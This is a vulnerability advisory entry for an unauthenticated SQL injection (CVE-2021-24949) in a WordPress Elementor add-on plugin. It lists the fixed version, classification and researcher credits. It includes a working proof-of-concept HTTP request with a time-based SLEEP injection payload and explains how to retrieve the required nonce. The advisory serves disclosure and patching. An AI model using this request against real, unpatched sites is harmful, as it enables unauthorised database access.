WordPress Plugin Vulnerabilities

The Plus Addons for Elementor Pro < 5.0.7 - Unauthenticated SQL Injection

Description

The "WP Search Filters" widget of the plugin does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection

Proof of Concept

The request requires a nonce (created with wp_create_nonce("theplus-searchfilter”)) which can be retrieved from a page where the widget is present, by looking at the source for "security".

POST /wp-admin/admin-ajax.php HTTP/2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 253

action=theplus_filter_post&nonce=b74e4cfaa0&option[0][filtertype]=search_list&option[0][post_type]=product&option[0][seapara][0][type]=taxonomy&option[0][seapara][0][field]=rating&option[0][seapara][0][value]=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))SQLi)

Affects Plugins

Plugin icon
theplus_elementor_addon
Fixed in 5.0.7

References

CVE
CVE-2021-24949
URL
https://roadmap.theplusaddons.com/updates

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Nicolas Vidal from TEHTRIS
Submitter
Nicolas Vidal from TEHTRIS
Verified
Yes
WPVDB ID
9d7f8ba8-a5d5-4ec3-a48f-5cd4b115e8d5

Timeline

Publicly Published
2021-12-13 (about 2 years ago)
Added
2021-12-13 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2022-12-05
Title
Contest Gallery < 19.1.5 - Author+ SQL Injection
Published
2014-08-01
Title
portfolio-slideshow-pro v3 - SQL Injection
Published
2014-08-01
Title
Contextual Related Posts < 1.8.10.2 - Multiple Parameter SQL Injection
Published
2021-07-15
Title
Woocommerce 3.3 to 5.5 - Authenticated Blind SQL Injection
Published
2014-08-01
Title
Cardoza WordPress poll - Multiple SQL Injection Vulnerabilities